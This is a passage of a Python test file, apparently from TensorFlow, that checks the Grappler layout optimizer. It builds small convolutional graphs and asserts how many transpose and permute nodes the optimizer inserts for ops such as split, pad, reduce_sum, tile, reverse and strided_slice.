x = random_ops.truncated_normal([2, 5, 5, 4], seed=0)
scale = constant_op.constant(0.1, shape=[4])
offset = constant_op.constant(0.3, shape=[4])
y, mean, _ = nn.fused_batch_norm(x, scale, offset)
mul = math_ops.add(y, mean)
output = array_ops.identity(mul)
return output
def _model_with_branch(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
w_conv2 = _weight([5, 5, 1, 32])
c_conv1 = _conv2d(x_image, w_conv1)
c_conv2 = _conv2d(x_image, w_conv2)
add = math_ops.add(c_conv1, c_conv2)
return add
def _model_with_vec_and_4d(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
c_conv1 = _conv2d(x_image, w_conv1)
vector = constant_op.constant(6.4, shape=[32])
add = math_ops.add(c_conv1, vector)
return add
def _loop():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(_two_layer_model, elems, dtype=dtypes.float32)
return outputs
def _loop_with_branch():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(
_model_with_branch, elems, dtype=dtypes.float32)
return outputs
def _loop_with_vec_and_4d():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(
_model_with_vec_and_4d, elems, dtype=dtypes.float32)
return outputs
def _get_config(layout_optimizer=True):
if layout_optimizer:
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON)
else:
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.OFF)
graph_options = config_pb2.GraphOptions(
rewrite_options=rewrite_options, build_cost_model=1)
config = config_pb2.ConfigProto(graph_options=graph_options)
return config
def _simple_metagraph(depthwise=False):
random_seed.set_random_seed(0)
x = variables.Variable(random_ops.truncated_normal([1, 200, 200, 3], seed=0))
conv = conv_layers.separable_conv2d if depthwise else conv_layers.conv2d
y = conv(x, 32, [3, 3])
z = conv(y, 32, [3, 3])
optimizer = gradient_descent.GradientDescentOptimizer(1e-4)
loss = math_ops.reduce_mean(z)
train_op = optimizer.minimize(loss)
graph = ops.get_default_graph()
graph.add_to_collection('train_op', train_op)
meta_graph = saver_lib.export_meta_graph(graph_def=graph.as_graph_def())
return meta_graph
def _get_cluster():
named_device = device_properties_pb2.NamedDevice()
named_device.name = '/GPU:0'
named_device.properties.type = 'GPU'
named_device.properties.environment['architecture'] = '4'
cluster = gcluster.Cluster(devices=[named_device])
return cluster
class LayoutOptimizerTest(test.TestCase):
"""Tests the Grappler layout optimizer."""
def _train(self, checkpoint_path, layout_optimizer=False, restore=False):
ops.reset_default_graph()
graph = ops.get_default_graph()
with session.Session(
config=_get_config(layout_optimizer), graph=graph) as sess:
batch = 2
height = 6
width = 7
input_channels = 3
shape = [batch, height, width, input_channels]
image = array_ops.placeholder(dtype='float32', shape=shape)
conv1 = conv_layers.conv2d(image, 32, [3, 3])
conv2 = conv_layers.conv2d(conv1, 32, [3, 3])
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
loss = math_ops.reduce_mean(conv2)
train_op = optimizer.minimize(loss)
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V2)
if restore:
saver.restore(sess, checkpoint_path)
else:
sess.run(variables.global_variables_initializer())
np.random.seed(0)
for _ in range(2):
image_val = np.random.rand(*shape).astype(np.float32)
sess.run([loss, train_op], feed_dict={image: image_val})
if restore:
all_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
all_vars_values = [var.eval(session=sess) for var in all_vars]
return all_vars_values
else:
saver.save(sess, checkpoint_path)
def testTwoConvLayers(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
output = _two_layer_model(x)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Relu_1-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSplitWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dim = array_ops.placeholder(dtype='int32')
split = array_ops.split(conv, 2, axis=dim)
output = math_ops.reduce_sum(split[0])
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={dim: 3})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata, feed_dict={dim: 3})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-split-0-0', nodes)
self.assertIn('LayoutOptimizerDimMapNHWCToNCHW_split_0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSplitVWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dim = array_ops.placeholder(dtype='int32')
sizes = constant_op.constant([50, 10, 4], shape=[3])
split = gen_array_ops._split_v(
value=conv, size_splits=sizes, axis=dim, num_split=3)
output = math_ops.reduce_sum(split[0])
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={dim: 3})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata, feed_dict={dim: 3})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-SplitV-0-0', nodes)
self.assertIn('LayoutOptimizerDimMapNHWCToNCHW_SplitV_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testPadWithConstPaddings(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
paddings_val = [[1, 2], [3, 4], [5, 6], [7, 8]]
paddings = constant_op.constant(
paddings_val, dtype='int32', name='PaddingsConst')
pad = array_ops.pad(conv, paddings)
output = array_ops.identity(pad)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Pad-0-0', nodes)
self.assertIn('LayoutOptimizer-Pad-PaddingsConst', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSum(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv)
output = array_ops.identity(reduce_sum)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongHWC(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[1, 2, 3])
output = array_ops.identity(reduce_sum)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongNHW(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[0, 1, 2])
output = array_ops.identity(reduce_sum)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongC(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[3])
output = array_ops.identity(reduce_sum)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testConcatWithControlDependency(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
axis = constant_op.constant(3)
var = variables.Variable(3)
assign = state_ops.assign(var, 6)
with ops.control_dependencies([assign]):
concat = array_ops.concat([conv, conv], axis)
output = array_ops.identity(concat)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-concat-0-0', nodes)
self.assertIn('LayoutOptimizer-concat-Const_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testFill(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
shape = array_ops.shape(conv)
scalar = array_ops.constant(5.7)
fill = array_ops.fill(shape, scalar)
output = array_ops.identity(fill)
x_val = [3.4] * 784
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
x: x_val
})
nodes = []
num_transposes = 0
num_vec_permute = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
if node.name.startswith('LayoutOptimizerVecPermute'):
num_vec_permute += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
# Two vector permute nodes were initially added in the Expand phase of
# LayoutOptimizer; they cancelled out each other in the Collapse phase.
expected_vec_permute = 0
self.assertEqual(expected_vec_permute, num_vec_permute)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Fill-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testTile(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
multiple = array_ops.placeholder(dtype='int32')
tile = array_ops.tile(conv, multiple)
output = array_ops.identity(tile)
multiple_val = [2, 3, 4, 1]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={multiple: multiple_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
multiple: multiple_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Tile-0-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_Tile_1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReverseWithConstDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dims = constant_op.constant([3, 1], name='DimsConst')
reverse = array_ops.reverse(conv, dims)
output = array_ops.identity(reverse)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-ReverseV2-0-0', nodes)
self.assertIn('LayoutOptimizer-ReverseV2-DimsConst', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReverseWithNonConstDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dims = array_ops.placeholder(dtype='int32')
reverse = array_ops.reverse(conv, dims)
output = array_ops.identity(reverse)
dims_val = [2, 3]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={dims: dims_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
dims: dims_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-ReverseV2-0-0', nodes)
self.assertIn('LayoutOptimizerDimMapNHWCToNCHW_ReverseV2_1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOp(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
mean = math_ops.reduce_mean(conv)
condition = math_ops.less(conv, mean)
select = gen_math_ops._select(condition, conv, add)
output = array_ops.identity(select)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Select-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOpScalarCondition(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
condition = constant_op.constant(True)
select = gen_math_ops._select(condition, conv, add)
output = array_ops.identity(select)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Select-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testPadWithNonConstPaddings(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
paddings = array_ops.placeholder(dtype='int32')
pad = array_ops.pad(conv, paddings)
output = array_ops.identity(pad)
paddings_val = [[1, 2], [3, 4], [5, 6], [7, 8]]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={paddings: paddings_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
paddings: paddings_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Pad-0-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_Pad_1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testMaxPoolV2(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
ksize = constant_op.constant([1, 2, 3, 1], shape=[4])
strides = array_ops.placeholder(dtype='int32', shape=[4])
max_pool = gen_nn_ops._max_pool_v2(conv, ksize, strides, 'VALID')
output = array_ops.identity(max_pool)
strides_val = [1, 3, 2, 1]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={strides: strides_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
strides: strides_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-MaxPoolV2-0-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_MaxPoolV2_2', nodes)
self.assertIn('LayoutOptimizer-MaxPoolV2-Const_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testMaxPoolGradV2(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
ksize = constant_op.constant([1, 2, 3, 1], shape=[4])
strides = array_ops.placeholder(dtype='int32', shape=[4])
max_pool_grad = gen_nn_ops.max_pool_grad_v2(conv, conv, conv, ksize,
strides, 'VALID')
output = array_ops.identity(max_pool_grad)
strides_val = [1, 3, 2, 1]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={strides: strides_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
strides: strides_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-MaxPoolGradV2-0-0',
nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_MaxPoolGradV2_4',
nodes)
self.assertIn('LayoutOptimizer-MaxPoolGradV2-Const_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSliceWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
size = array_ops.placeholder(dtype='int32')
s = array_ops.slice(conv, [0, 0, 0, 0], size)
output = array_ops.identity(s)
size_val = [1, 2, 3, 4]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={size: size_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
size: size_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Slice-0-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_Slice_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
end = array_ops.placeholder(dtype='int32')
s = array_ops.strided_slice(conv, [0, 0, 0, 0], end, strides=[1, 2, 3, 1])
output = array_ops.identity(s)
end_val = [1, 2, 3, 4]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={end: end_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
end: end_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-StridedSlice-0-0',
nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_StridedSlice_2', nodes)
self.assertIn('LayoutOptimizer-StridedSlice-StridedSlice/begin', nodes)
self.assertIn('LayoutOptimizer-StridedSlice-StridedSlice/strides', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithMask(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
# This will generate a StridedSlice op with begin mask and end mask.
s = conv[:, :, 1:-1, :]
output = array_ops.identity(s)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-strided_slice-0-0',
nodes)
self.assertIn('LayoutOptimizer-strided_slice-strided_slice/stack', nodes)
self.assertIn('LayoutOptimizer-strided_slice-strided_slice/stack_1',
nodes)
self.assertIn('LayoutOptimizer-strided_slice-strided_slice/stack_2',
nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceGradWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
end = array_ops.placeholder(dtype='int32')
shape = array_ops.shape(conv)
end_val = [1, 2, 3, 4]
s = array_ops.strided_slice(
conv, [0, 0, 0, 0], end_val, strides=[1, 2, 3, 1])
s_grad = array_ops.strided_slice_grad(shape, [0, 0, 0, 0], end,
[1, 2, 3, 1], s)
output = array_ops.identity(s_grad)
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={end: end_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
end: end_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-StridedSliceGrad-0-0',
nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_StridedSliceGrad_2',
nodes)
self.assertIn('LayoutOptimizer-StridedSlice-StridedSliceGrad/begin',
nodes)
self.assertIn('LayoutOptimizer-StridedSlice-StridedSliceGrad/strides',
nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testShapeN(self):
if test.is_gpu_available(cuda_only=True):
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
shapen = array_ops.shape_n([conv, conv])
output = math_ops.add(shapen[0], shapen[1])
